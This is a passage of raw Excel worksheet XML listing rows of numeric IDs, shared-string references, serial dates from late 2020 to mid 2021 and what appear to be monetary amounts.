        <v>2813</v>
      </c>
      <c r="C3330" t="s">
        <v>8181</v>
      </c>
      <c r="D3330" t="s">
        <v>12624</v>
      </c>
      <c r="E3330">
        <v>8</v>
      </c>
      <c r="F3330" t="s">
        <v>10251</v>
      </c>
      <c r="G3330" s="1">
        <v>44172</v>
      </c>
      <c r="H3330">
        <v>4000000</v>
      </c>
    </row>
    <row r="3331" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3331">
        <v>23407</v>
      </c>
      <c r="B3331">
        <v>2290</v>
      </c>
      <c r="C3331" t="s">
        <v>5238</v>
      </c>
      <c r="D3331" t="s">
        <v>12625</v>
      </c>
      <c r="E3331">
        <v>13</v>
      </c>
      <c r="F3331" t="s">
        <v>12626</v>
      </c>
      <c r="G3331" s="1">
        <v>44267</v>
      </c>
      <c r="H3331">
        <v>100</v>
      </c>
      <c r="I3331" t="s">
        <v>12627</v>
      </c>
    </row>
    <row r="3332" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3332">
        <v>23410</v>
      </c>
      <c r="B3332">
        <v>2127</v>
      </c>
      <c r="C3332" t="s">
        <v>6347</v>
      </c>
      <c r="D3332" t="s">
        <v>12628</v>
      </c>
      <c r="E3332">
        <v>16</v>
      </c>
      <c r="F3332" t="s">
        <v>3318</v>
      </c>
      <c r="G3332" s="1">
        <v>44210</v>
      </c>
      <c r="H3332">
        <v>2500</v>
      </c>
      <c r="J3332" t="s">
        <v>9752</v>
      </c>
    </row>
    <row r="3333" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3333">
        <v>23413</v>
      </c>
      <c r="B3333">
        <v>5125</v>
      </c>
      <c r="C3333" t="s">
        <v>8086</v>
      </c>
      <c r="D3333" t="s">
        <v>12629</v>
      </c>
      <c r="E3333">
        <v>13</v>
      </c>
      <c r="F3333" t="s">
        <v>3341</v>
      </c>
      <c r="G3333" s="1">
        <v>44236</v>
      </c>
      <c r="H3333">
        <v>2400</v>
      </c>
      <c r="I3333" t="s">
        <v>12630</v>
      </c>
    </row>
    <row r="3334" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3334">
        <v>23414</v>
      </c>
      <c r="B3334">
        <v>1379</v>
      </c>
      <c r="C3334" t="s">
        <v>3913</v>
      </c>
      <c r="D3334" t="s">
        <v>12631</v>
      </c>
      <c r="E3334">
        <v>9</v>
      </c>
      <c r="F3334" t="s">
        <v>1276</v>
      </c>
      <c r="G3334" s="1">
        <v>44193</v>
      </c>
      <c r="H3334">
        <v>130000000</v>
      </c>
      <c r="I3334" t="s">
        <v>12632</v>
      </c>
    </row>
    <row r="3335" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3335">
        <v>23417</v>
      </c>
      <c r="B3335">
        <v>285</v>
      </c>
      <c r="C3335" t="s">
        <v>16494</v>
      </c>
      <c r="D3335" t="s">
        <v>16396</v>
      </c>
      <c r="E3335">
        <v>16</v>
      </c>
      <c r="F3335" t="s">
        <v>12633</v>
      </c>
      <c r="G3335" s="1">
        <v>44218</v>
      </c>
      <c r="H3335">
        <v>15294.6</v>
      </c>
      <c r="J3335" t="s">
        <v>9478</v>
      </c>
    </row>
    <row r="3336" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3336">
        <v>23418</v>
      </c>
      <c r="B3336">
        <v>285</v>
      </c>
      <c r="C3336" t="s">
        <v>16494</v>
      </c>
      <c r="D3336" t="s">
        <v>16396</v>
      </c>
      <c r="E3336">
        <v>16</v>
      </c>
      <c r="F3336" t="s">
        <v>12634</v>
      </c>
      <c r="G3336" s="1">
        <v>44218</v>
      </c>
      <c r="H3336">
        <v>163857.18</v>
      </c>
      <c r="J3336" t="s">
        <v>9478</v>
      </c>
    </row>
    <row r="3337" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3337">
        <v>23419</v>
      </c>
      <c r="B3337">
        <v>285</v>
      </c>
      <c r="C3337" t="s">
        <v>1078</v>
      </c>
      <c r="D3337" t="s">
        <v>9575</v>
      </c>
      <c r="E3337">
        <v>16</v>
      </c>
      <c r="F3337" t="s">
        <v>9435</v>
      </c>
      <c r="G3337" s="1">
        <v>44218</v>
      </c>
      <c r="H3337">
        <v>14375</v>
      </c>
      <c r="J3337" t="s">
        <v>9478</v>
      </c>
    </row>
    <row r="3338" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3338">
        <v>23420</v>
      </c>
      <c r="B3338">
        <v>796</v>
      </c>
      <c r="C3338" t="s">
        <v>467</v>
      </c>
      <c r="D3338" t="s">
        <v>12538</v>
      </c>
      <c r="E3338">
        <v>2</v>
      </c>
      <c r="F3338" t="s">
        <v>4062</v>
      </c>
      <c r="G3338" s="1">
        <v>44181</v>
      </c>
      <c r="H3338">
        <v>850000</v>
      </c>
      <c r="J3338" t="s">
        <v>12635</v>
      </c>
    </row>
    <row r="3339" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3339">
        <v>23421</v>
      </c>
      <c r="B3339">
        <v>285</v>
      </c>
      <c r="C3339" t="s">
        <v>1078</v>
      </c>
      <c r="D3339" t="s">
        <v>9575</v>
      </c>
      <c r="E3339">
        <v>16</v>
      </c>
      <c r="F3339" t="s">
        <v>12636</v>
      </c>
      <c r="G3339" s="1">
        <v>44218</v>
      </c>
      <c r="H3339">
        <v>40791</v>
      </c>
      <c r="J3339" t="s">
        <v>9478</v>
      </c>
    </row>
    <row r="3340" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3340">
        <v>23422</v>
      </c>
      <c r="B3340">
        <v>285</v>
      </c>
      <c r="C3340" t="s">
        <v>1078</v>
      </c>
      <c r="D3340" t="s">
        <v>9575</v>
      </c>
      <c r="E3340">
        <v>16</v>
      </c>
      <c r="F3340" t="s">
        <v>3204</v>
      </c>
      <c r="G3340" s="1">
        <v>44218</v>
      </c>
      <c r="H3340">
        <v>5000</v>
      </c>
      <c r="J3340" t="s">
        <v>9478</v>
      </c>
    </row>
    <row r="3341" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3341">
        <v>23423</v>
      </c>
      <c r="B3341">
        <v>5155</v>
      </c>
      <c r="C3341" t="s">
        <v>8188</v>
      </c>
      <c r="D3341" t="s">
        <v>12637</v>
      </c>
      <c r="E3341">
        <v>14</v>
      </c>
      <c r="F3341" t="s">
        <v>12638</v>
      </c>
      <c r="G3341" s="1">
        <v>44270</v>
      </c>
      <c r="H3341">
        <v>25000</v>
      </c>
      <c r="J3341" t="s">
        <v>9456</v>
      </c>
    </row>
    <row r="3342" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3342">
        <v>23424</v>
      </c>
      <c r="B3342">
        <v>5155</v>
      </c>
      <c r="C3342" t="s">
        <v>8188</v>
      </c>
      <c r="D3342" t="s">
        <v>12637</v>
      </c>
      <c r="E3342">
        <v>14</v>
      </c>
      <c r="F3342" t="s">
        <v>12639</v>
      </c>
      <c r="G3342" s="1">
        <v>44270</v>
      </c>
      <c r="H3342">
        <v>25000</v>
      </c>
      <c r="J3342" t="s">
        <v>9456</v>
      </c>
    </row>
    <row r="3343" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3343">
        <v>23425</v>
      </c>
      <c r="B3343">
        <v>5155</v>
      </c>
      <c r="C3343" t="s">
        <v>8188</v>
      </c>
      <c r="D3343" t="s">
        <v>12637</v>
      </c>
      <c r="E3343">
        <v>14</v>
      </c>
      <c r="F3343" t="s">
        <v>547</v>
      </c>
      <c r="G3343" s="1">
        <v>44270</v>
      </c>
      <c r="H3343">
        <v>25000</v>
      </c>
      <c r="J3343" t="s">
        <v>9456</v>
      </c>
    </row>
    <row r="3344" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3344">
        <v>23429</v>
      </c>
      <c r="B3344">
        <v>1034</v>
      </c>
      <c r="C3344" t="s">
        <v>3945</v>
      </c>
      <c r="D3344" t="s">
        <v>12640</v>
      </c>
      <c r="E3344">
        <v>16</v>
      </c>
      <c r="F3344" t="s">
        <v>12641</v>
      </c>
      <c r="G3344" s="1">
        <v>44274</v>
      </c>
      <c r="H3344">
        <v>500000</v>
      </c>
      <c r="I3344" t="s">
        <v>12642</v>
      </c>
    </row>
    <row r="3345" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3345">
        <v>23430</v>
      </c>
      <c r="B3345">
        <v>5155</v>
      </c>
      <c r="C3345" t="s">
        <v>8188</v>
      </c>
      <c r="D3345" t="s">
        <v>12637</v>
      </c>
      <c r="E3345">
        <v>14</v>
      </c>
      <c r="F3345" t="s">
        <v>7564</v>
      </c>
      <c r="G3345" s="1">
        <v>44270</v>
      </c>
      <c r="H3345">
        <v>25000</v>
      </c>
      <c r="J3345" t="s">
        <v>9456</v>
      </c>
    </row>
    <row r="3346" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3346">
        <v>23431</v>
      </c>
      <c r="B3346">
        <v>7</v>
      </c>
      <c r="C3346" t="s">
        <v>2143</v>
      </c>
      <c r="D3346" t="s">
        <v>12643</v>
      </c>
      <c r="E3346">
        <v>12</v>
      </c>
      <c r="F3346" t="s">
        <v>2924</v>
      </c>
      <c r="G3346" s="1">
        <v>44207</v>
      </c>
      <c r="H3346">
        <v>400000</v>
      </c>
      <c r="I3346" t="s">
        <v>11980</v>
      </c>
    </row>
    <row r="3347" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3347">
        <v>23433</v>
      </c>
      <c r="B3347">
        <v>7</v>
      </c>
      <c r="C3347" t="s">
        <v>2143</v>
      </c>
      <c r="D3347" t="s">
        <v>12644</v>
      </c>
      <c r="E3347">
        <v>12</v>
      </c>
      <c r="F3347" t="s">
        <v>9577</v>
      </c>
      <c r="G3347" s="1">
        <v>44207</v>
      </c>
      <c r="H3347">
        <v>100000</v>
      </c>
      <c r="I3347" t="s">
        <v>11980</v>
      </c>
    </row>
    <row r="3348" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3348">
        <v>23435</v>
      </c>
      <c r="B3348">
        <v>7</v>
      </c>
      <c r="C3348" t="s">
        <v>2143</v>
      </c>
      <c r="D3348" t="s">
        <v>12644</v>
      </c>
      <c r="E3348">
        <v>12</v>
      </c>
      <c r="F3348" t="s">
        <v>9676</v>
      </c>
      <c r="G3348" s="1">
        <v>44207</v>
      </c>
      <c r="H3348">
        <v>200000</v>
      </c>
      <c r="I3348" t="s">
        <v>11980</v>
      </c>
    </row>
    <row r="3349" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3349">
        <v>23437</v>
      </c>
      <c r="B3349">
        <v>7</v>
      </c>
      <c r="C3349" t="s">
        <v>2143</v>
      </c>
      <c r="D3349" t="s">
        <v>12644</v>
      </c>
      <c r="E3349">
        <v>12</v>
      </c>
      <c r="F3349" t="s">
        <v>9928</v>
      </c>
      <c r="G3349" s="1">
        <v>44207</v>
      </c>
      <c r="H3349">
        <v>100000</v>
      </c>
      <c r="I3349" t="s">
        <v>11980</v>
      </c>
    </row>
    <row r="3350" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3350">
        <v>23439</v>
      </c>
      <c r="B3350">
        <v>1277</v>
      </c>
      <c r="C3350" t="s">
        <v>3396</v>
      </c>
      <c r="D3350" t="s">
        <v>12645</v>
      </c>
      <c r="E3350">
        <v>2</v>
      </c>
      <c r="F3350" t="s">
        <v>9472</v>
      </c>
      <c r="G3350" s="1">
        <v>44201</v>
      </c>
      <c r="H3350">
        <v>500</v>
      </c>
      <c r="I3350" t="s">
        <v>12646</v>
      </c>
      <c r="J3350" t="s">
        <v>12647</v>
      </c>
    </row>
    <row r="3351" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3351">
        <v>23440</v>
      </c>
      <c r="B3351">
        <v>1277</v>
      </c>
      <c r="C3351" t="s">
        <v>16434</v>
      </c>
      <c r="D3351" t="s">
        <v>16495</v>
      </c>
      <c r="E3351">
        <v>2</v>
      </c>
      <c r="F3351" t="s">
        <v>12648</v>
      </c>
      <c r="G3351" s="1">
        <v>44201</v>
      </c>
      <c r="H3351" s="4">
        <v>30000</v>
      </c>
      <c r="I3351" t="s">
        <v>12649</v>
      </c>
      <c r="J3351" t="s">
        <v>12647</v>
      </c>
    </row>
    <row r="3352" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3352">
        <v>23441</v>
      </c>
      <c r="B3352">
        <v>1277</v>
      </c>
      <c r="C3352" t="s">
        <v>16434</v>
      </c>
      <c r="D3352" t="s">
        <v>16495</v>
      </c>
      <c r="E3352">
        <v>2</v>
      </c>
      <c r="F3352" t="s">
        <v>3204</v>
      </c>
      <c r="G3352" s="1">
        <v>44201</v>
      </c>
      <c r="H3352" s="4">
        <v>4500</v>
      </c>
      <c r="I3352" t="s">
        <v>12650</v>
      </c>
      <c r="J3352" t="s">
        <v>12647</v>
      </c>
    </row>
    <row r="3353" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3353">
        <v>23442</v>
      </c>
      <c r="B3353">
        <v>1277</v>
      </c>
      <c r="C3353" t="s">
        <v>16434</v>
      </c>
      <c r="D3353" t="s">
        <v>16495</v>
      </c>
      <c r="E3353">
        <v>2</v>
      </c>
      <c r="F3353" t="s">
        <v>547</v>
      </c>
      <c r="G3353" s="1">
        <v>44201</v>
      </c>
      <c r="H3353" s="4">
        <v>1000</v>
      </c>
      <c r="I3353" t="s">
        <v>12649</v>
      </c>
      <c r="J3353" t="s">
        <v>12647</v>
      </c>
    </row>
    <row r="3354" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3354">
        <v>23443</v>
      </c>
      <c r="B3354">
        <v>364</v>
      </c>
      <c r="C3354" t="s">
        <v>372</v>
      </c>
      <c r="D3354" t="s">
        <v>12651</v>
      </c>
      <c r="E3354">
        <v>16</v>
      </c>
      <c r="F3354" t="s">
        <v>1455</v>
      </c>
      <c r="G3354" s="1">
        <v>44214</v>
      </c>
      <c r="H3354">
        <v>1800000</v>
      </c>
      <c r="I3354" t="s">
        <v>12652</v>
      </c>
    </row>
    <row r="3355" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3355">
        <v>23444</v>
      </c>
      <c r="B3355">
        <v>364</v>
      </c>
      <c r="C3355" t="s">
        <v>372</v>
      </c>
      <c r="D3355" t="s">
        <v>12651</v>
      </c>
      <c r="E3355">
        <v>16</v>
      </c>
      <c r="F3355" t="s">
        <v>3242</v>
      </c>
      <c r="G3355" s="1">
        <v>44214</v>
      </c>
      <c r="H3355">
        <v>120000</v>
      </c>
      <c r="I3355" t="s">
        <v>12653</v>
      </c>
    </row>
    <row r="3356" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3356">
        <v>23445</v>
      </c>
      <c r="B3356">
        <v>2024</v>
      </c>
      <c r="C3356" t="s">
        <v>16277</v>
      </c>
      <c r="D3356" t="s">
        <v>16278</v>
      </c>
      <c r="E3356">
        <v>16</v>
      </c>
      <c r="F3356" t="s">
        <v>9595</v>
      </c>
      <c r="G3356" s="1">
        <v>44230</v>
      </c>
      <c r="H3356" s="4">
        <v>50000</v>
      </c>
      <c r="J3356" t="s">
        <v>12654</v>
      </c>
    </row>
    <row r="3357" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3357">
        <v>23446</v>
      </c>
      <c r="B3357">
        <v>2024</v>
      </c>
      <c r="C3357" t="s">
        <v>16277</v>
      </c>
      <c r="D3357" t="s">
        <v>16278</v>
      </c>
      <c r="E3357">
        <v>16</v>
      </c>
      <c r="F3357" t="s">
        <v>9523</v>
      </c>
      <c r="G3357" s="1">
        <v>44230</v>
      </c>
      <c r="H3357" s="4">
        <v>50000</v>
      </c>
      <c r="J3357" t="s">
        <v>12655</v>
      </c>
    </row>
    <row r="3358" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3358">
        <v>23447</v>
      </c>
      <c r="B3358">
        <v>2024</v>
      </c>
      <c r="C3358" t="s">
        <v>16277</v>
      </c>
      <c r="D3358" t="s">
        <v>16278</v>
      </c>
      <c r="E3358">
        <v>16</v>
      </c>
      <c r="F3358" t="s">
        <v>10130</v>
      </c>
      <c r="G3358" s="1">
        <v>44230</v>
      </c>
      <c r="H3358" s="4">
        <v>100000</v>
      </c>
      <c r="J3358" t="s">
        <v>12654</v>
      </c>
    </row>
    <row r="3359" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3359">
        <v>23448</v>
      </c>
      <c r="B3359">
        <v>2024</v>
      </c>
      <c r="C3359" t="s">
        <v>16277</v>
      </c>
      <c r="D3359" t="s">
        <v>16278</v>
      </c>
      <c r="E3359">
        <v>16</v>
      </c>
      <c r="F3359" t="s">
        <v>9558</v>
      </c>
      <c r="G3359" s="1">
        <v>44230</v>
      </c>
      <c r="H3359" s="4">
        <v>50000</v>
      </c>
      <c r="J3359" t="s">
        <v>12656</v>
      </c>
    </row>
    <row r="3360" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3360">
        <v>23449</v>
      </c>
      <c r="B3360">
        <v>2024</v>
      </c>
      <c r="C3360" t="s">
        <v>16277</v>
      </c>
      <c r="D3360" t="s">
        <v>16278</v>
      </c>
      <c r="E3360">
        <v>16</v>
      </c>
      <c r="F3360" t="s">
        <v>11687</v>
      </c>
      <c r="G3360" s="1">
        <v>44230</v>
      </c>
      <c r="H3360" s="4">
        <v>50000</v>
      </c>
      <c r="J3360" t="s">
        <v>12657</v>
      </c>
    </row>
    <row r="3361" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3361">
        <v>23450</v>
      </c>
      <c r="B3361">
        <v>2024</v>
      </c>
      <c r="C3361" t="s">
        <v>16277</v>
      </c>
      <c r="D3361" t="s">
        <v>16278</v>
      </c>
      <c r="E3361">
        <v>16</v>
      </c>
      <c r="F3361" t="s">
        <v>9849</v>
      </c>
      <c r="G3361" s="1">
        <v>44230</v>
      </c>
      <c r="H3361" s="4">
        <v>50000</v>
      </c>
      <c r="J3361" t="s">
        <v>12657</v>
      </c>
    </row>
    <row r="3362" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3362">
        <v>23451</v>
      </c>
      <c r="B3362">
        <v>2024</v>
      </c>
      <c r="C3362" t="s">
        <v>16277</v>
      </c>
      <c r="D3362" t="s">
        <v>16278</v>
      </c>
      <c r="E3362">
        <v>16</v>
      </c>
      <c r="F3362" t="s">
        <v>12658</v>
      </c>
      <c r="G3362" s="1">
        <v>44230</v>
      </c>
      <c r="H3362" s="4">
        <v>50000</v>
      </c>
      <c r="J3362" t="s">
        <v>12659</v>
      </c>
    </row>
    <row r="3363" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3363">
        <v>23456</v>
      </c>
      <c r="B3363">
        <v>1257</v>
      </c>
      <c r="C3363" t="s">
        <v>2547</v>
      </c>
      <c r="D3363" t="s">
        <v>12660</v>
      </c>
      <c r="E3363">
        <v>16</v>
      </c>
      <c r="F3363" t="s">
        <v>9610</v>
      </c>
      <c r="G3363" s="1">
        <v>44218</v>
      </c>
      <c r="H3363">
        <v>5000</v>
      </c>
      <c r="J3363" t="s">
        <v>9478</v>
      </c>
    </row>
    <row r="3364" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3364">
        <v>23457</v>
      </c>
      <c r="B3364">
        <v>1257</v>
      </c>
      <c r="C3364" t="s">
        <v>2547</v>
      </c>
      <c r="D3364" t="s">
        <v>12660</v>
      </c>
      <c r="E3364">
        <v>16</v>
      </c>
      <c r="F3364" t="s">
        <v>7241</v>
      </c>
      <c r="G3364" s="1">
        <v>44218</v>
      </c>
      <c r="H3364">
        <v>5000</v>
      </c>
      <c r="J3364" t="s">
        <v>9478</v>
      </c>
    </row>
    <row r="3365" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3365">
        <v>23458</v>
      </c>
      <c r="B3365">
        <v>1257</v>
      </c>
      <c r="C3365" t="s">
        <v>2547</v>
      </c>
      <c r="D3365" t="s">
        <v>12660</v>
      </c>
      <c r="E3365">
        <v>16</v>
      </c>
      <c r="F3365" t="s">
        <v>12661</v>
      </c>
      <c r="G3365" s="1">
        <v>44218</v>
      </c>
      <c r="H3365">
        <v>5000</v>
      </c>
      <c r="J3365" t="s">
        <v>9478</v>
      </c>
    </row>
    <row r="3366" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3366">
        <v>23459</v>
      </c>
      <c r="B3366">
        <v>1257</v>
      </c>
      <c r="C3366" t="s">
        <v>2547</v>
      </c>
      <c r="D3366" t="s">
        <v>12660</v>
      </c>
      <c r="E3366">
        <v>16</v>
      </c>
      <c r="F3366" t="s">
        <v>12662</v>
      </c>
      <c r="G3366" s="1">
        <v>44218</v>
      </c>
      <c r="H3366">
        <v>5000</v>
      </c>
      <c r="J3366" t="s">
        <v>9478</v>
      </c>
    </row>
    <row r="3367" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3367">
        <v>23460</v>
      </c>
      <c r="B3367">
        <v>1257</v>
      </c>
      <c r="C3367" t="s">
        <v>2547</v>
      </c>
      <c r="D3367" t="s">
        <v>12660</v>
      </c>
      <c r="E3367">
        <v>16</v>
      </c>
      <c r="F3367" t="s">
        <v>2236</v>
      </c>
      <c r="G3367" s="1">
        <v>44218</v>
      </c>
      <c r="H3367">
        <v>5000</v>
      </c>
      <c r="J3367" t="s">
        <v>9478</v>
      </c>
    </row>
    <row r="3368" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3368">
        <v>23461</v>
      </c>
      <c r="B3368">
        <v>1257</v>
      </c>
      <c r="C3368" t="s">
        <v>2547</v>
      </c>
      <c r="D3368" t="s">
        <v>12660</v>
      </c>
      <c r="E3368">
        <v>16</v>
      </c>
      <c r="F3368" t="s">
        <v>1746</v>
      </c>
      <c r="G3368" s="1">
        <v>44218</v>
      </c>
      <c r="H3368">
        <v>10000</v>
      </c>
      <c r="J3368" t="s">
        <v>9478</v>
      </c>
    </row>
    <row r="3369" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3369">
        <v>23462</v>
      </c>
      <c r="B3369">
        <v>1980</v>
      </c>
      <c r="C3369" t="s">
        <v>6111</v>
      </c>
      <c r="D3369" t="s">
        <v>9750</v>
      </c>
      <c r="E3369">
        <v>16</v>
      </c>
      <c r="F3369" t="s">
        <v>11919</v>
      </c>
      <c r="G3369" s="1">
        <v>44194</v>
      </c>
      <c r="H3369">
        <v>2184000</v>
      </c>
      <c r="I3369" t="s">
        <v>11192</v>
      </c>
      <c r="J3369" t="s">
        <v>9752</v>
      </c>
    </row>
    <row r="3370" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3370">
        <v>23465</v>
      </c>
      <c r="B3370">
        <v>280</v>
      </c>
      <c r="C3370" t="s">
        <v>702</v>
      </c>
      <c r="D3370" t="s">
        <v>10484</v>
      </c>
      <c r="E3370">
        <v>16</v>
      </c>
      <c r="F3370" t="s">
        <v>10007</v>
      </c>
      <c r="G3370" s="1">
        <v>44207</v>
      </c>
      <c r="H3370">
        <v>70000</v>
      </c>
      <c r="J3370" t="s">
        <v>9478</v>
      </c>
    </row>
    <row r="3371" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3371">
        <v>23466</v>
      </c>
      <c r="B3371">
        <v>2241</v>
      </c>
      <c r="C3371" t="s">
        <v>5775</v>
      </c>
      <c r="D3371" t="s">
        <v>12663</v>
      </c>
      <c r="E3371">
        <v>16</v>
      </c>
      <c r="F3371" t="s">
        <v>9849</v>
      </c>
      <c r="G3371" s="1">
        <v>44281</v>
      </c>
      <c r="H3371">
        <v>270000</v>
      </c>
      <c r="J3371" t="s">
        <v>9456</v>
      </c>
    </row>
    <row r="3372" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3372">
        <v>23467</v>
      </c>
      <c r="B3372">
        <v>834</v>
      </c>
      <c r="C3372" t="s">
        <v>2159</v>
      </c>
      <c r="D3372" t="s">
        <v>12664</v>
      </c>
      <c r="E3372">
        <v>21</v>
      </c>
      <c r="F3372" t="s">
        <v>1403</v>
      </c>
      <c r="G3372" s="1">
        <v>44382</v>
      </c>
      <c r="H3372">
        <v>92000</v>
      </c>
      <c r="I3372" t="s">
        <v>12665</v>
      </c>
      <c r="J3372" t="s">
        <v>9949</v>
      </c>
    </row>
    <row r="3373" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3373">
        <v>23468</v>
      </c>
      <c r="B3373">
        <v>834</v>
      </c>
      <c r="C3373" t="s">
        <v>2159</v>
      </c>
      <c r="D3373" t="s">
        <v>12664</v>
      </c>
      <c r="E3373">
        <v>21</v>
      </c>
      <c r="F3373" t="s">
        <v>11351</v>
      </c>
      <c r="G3373" s="1">
        <v>44382</v>
      </c>
      <c r="H3373">
        <v>90500</v>
      </c>
      <c r="I3373" t="s">
        <v>12665</v>
      </c>
      <c r="J3373" t="s">
        <v>9949</v>
      </c>
    </row>
    <row r="3374" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3374">
        <v>23469</v>
      </c>
      <c r="B3374">
        <v>834</v>
      </c>
      <c r="C3374" t="s">
        <v>2159</v>
      </c>
      <c r="D3374" t="s">
        <v>12664</v>
      </c>
      <c r="E3374">
        <v>21</v>
      </c>
      <c r="F3374" t="s">
        <v>6569</v>
      </c>
      <c r="G3374" s="1">
        <v>44382</v>
      </c>
      <c r="H3374">
        <v>91300</v>
      </c>
      <c r="I3374" t="s">
        <v>12665</v>
      </c>
      <c r="J3374" t="s">
        <v>9949</v>
      </c>
    </row>
    <row r="3375" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3375">
        <v>23471</v>
      </c>
      <c r="B3375">
        <v>1159</v>
      </c>
      <c r="C3375" t="s">
        <v>3887</v>
      </c>
      <c r="D3375" t="s">
        <v>12666</v>
      </c>
      <c r="E3375">
        <v>16</v>
      </c>
      <c r="F3375" t="s">
        <v>945</v>
      </c>
      <c r="G3375" s="1">
        <v>44253</v>
      </c>
      <c r="H3375">
        <v>60000</v>
      </c>
      <c r="J3375" t="s">
        <v>9538</v>
      </c>
    </row>
    <row r="3376" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3376">
        <v>23472</v>
      </c>
      <c r="B3376">
        <v>1159</v>
      </c>
      <c r="C3376" t="s">
        <v>3887</v>
      </c>
      <c r="D3376" t="s">
        <v>12666</v>
      </c>
      <c r="E3376">
        <v>16</v>
      </c>
      <c r="F3376" t="s">
        <v>1651</v>
      </c>
      <c r="G3376" s="1">
        <v>44253</v>
      </c>
      <c r="H3376">
        <v>350000</v>
      </c>
      <c r="I3376" t="s">
        <v>12667</v>
      </c>
    </row>
    <row r="3377" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3377">
        <v>23473</v>
      </c>
      <c r="B3377">
        <v>1385</v>
      </c>
      <c r="C3377" t="s">
        <v>3957</v>
      </c>
      <c r="D3377" t="s">
        <v>12668</v>
      </c>
      <c r="E3377">
        <v>11</v>
      </c>
      <c r="F3377" t="s">
        <v>7613</v>
      </c>
      <c r="G3377" s="1">
        <v>44216</v>
      </c>
      <c r="H3377">
        <v>80000</v>
      </c>
      <c r="J3377" t="s">
        <v>12669</v>
      </c>
    </row>
    <row r="3378" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3378">
        <v>23474</v>
      </c>
      <c r="B3378">
        <v>1385</v>
      </c>
      <c r="C3378" t="s">
        <v>3957</v>
      </c>
      <c r="D3378" t="s">
        <v>12668</v>
      </c>
      <c r="E3378">
        <v>11</v>
      </c>
      <c r="F3378" t="s">
        <v>9504</v>
      </c>
      <c r="G3378" s="1">
        <v>44216</v>
      </c>
      <c r="H3378">
        <v>50000</v>
      </c>
    </row>
    <row r="3379" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3379">
        <v>23475</v>
      </c>
      <c r="B3379">
        <v>2731</v>
      </c>
      <c r="C3379" t="s">
        <v>7086</v>
      </c>
      <c r="D3379" t="s">
        <v>12670</v>
      </c>
      <c r="E3379">
        <v>16</v>
      </c>
      <c r="F3379" t="s">
        <v>4062</v>
      </c>
      <c r="G3379" s="1">
        <v>44207</v>
      </c>
      <c r="H3379">
        <v>1200000</v>
      </c>
      <c r="J3379" t="s">
        <v>12671</v>
      </c>
    </row>
    <row r="3380" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3380">
        <v>23476</v>
      </c>
      <c r="B3380">
        <v>5159</v>
      </c>
      <c r="C3380" t="s">
        <v>8202</v>
      </c>
      <c r="D3380" t="s">
        <v>12672</v>
      </c>
      <c r="E3380">
        <v>26</v>
      </c>
      <c r="F3380" t="s">
        <v>364</v>
      </c>
      <c r="G3380" s="1">
        <v>44305</v>
      </c>
      <c r="H3380">
        <v>100000</v>
      </c>
      <c r="I3380" t="s">
        <v>12673</v>
      </c>
      <c r="J3380" t="s">
        <v>12674</v>
      </c>
    </row>
    <row r="3381" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3381">
        <v>23477</v>
      </c>
      <c r="B3381">
        <v>50</v>
      </c>
      <c r="C3381" t="s">
        <v>2168</v>
      </c>
      <c r="D3381" t="s">
        <v>12675</v>
      </c>
      <c r="E3381">
        <v>12</v>
      </c>
      <c r="F3381" t="s">
        <v>2924</v>
      </c>
      <c r="G3381" s="1">
        <v>44232</v>
      </c>
      <c r="H3381">
        <v>100000</v>
      </c>
      <c r="I3381" t="s">
        <v>12676</v>
      </c>
    </row>
    <row r="3382" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3382">
        <v>23478</v>
      </c>
      <c r="B3382">
        <v>50</v>
      </c>
      <c r="C3382" t="s">
        <v>2168</v>
      </c>
      <c r="D3382" t="s">
        <v>12675</v>
      </c>
      <c r="E3382">
        <v>12</v>
      </c>
      <c r="F3382" t="s">
        <v>9438</v>
      </c>
      <c r="G3382" s="1">
        <v>44232</v>
      </c>
      <c r="H3382">
        <v>50000</v>
      </c>
      <c r="I3382" t="s">
        <v>12676</v>
      </c>
    </row>
